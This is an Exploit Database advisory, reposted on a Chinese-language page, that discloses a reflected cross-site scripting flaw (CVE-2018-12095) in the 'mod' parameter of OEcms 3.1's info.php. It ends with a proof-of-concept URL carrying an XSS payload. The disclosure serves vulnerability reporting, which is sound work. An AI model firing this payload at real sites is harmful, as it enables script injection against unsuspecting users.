OEcms 3.1 – Cross-Site Scripting

• Exploit Database
• 130 阅读

• 作者： Renzi
  日期： 2018-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44895/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14

  # Title: OEcms 3.1 - Cross-Site Scripting # Author: Felipe "Renzi" Gabriel # Date: 2018-06-15 # Software: OEcms v3.1 # CVE: CVE-2018-12095 # Technical Details & Description: # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application. # The vulnerability is located in the &apos;mod&apos; parameter of the<code>info.php</code> action GET method request. # PoC http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>